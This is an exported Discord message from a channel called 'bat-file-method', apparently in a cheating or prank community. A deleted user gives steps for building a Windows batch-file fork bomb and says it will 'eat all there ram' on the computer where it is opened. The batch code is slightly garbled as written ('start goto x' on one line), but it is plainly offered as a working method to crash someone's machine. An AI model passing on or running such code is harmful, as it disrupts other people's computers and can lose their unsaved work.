==============================================================
Guild: BIGGEST SETS,METH0DS,T00LS,AIMLOCKS VAULT
Channel: random methods / bat-file-method
==============================================================

[AM] deleted user#3213
```
First: Create a text documemt

Second: Open it and type
@echo off 
:x
start goto x
Then save it as a .bat file

Third: this is called a fork bomb and once you open you will eat all there ram in the computer
```


==============================================================
Exported 1 message(s)
==============================================================
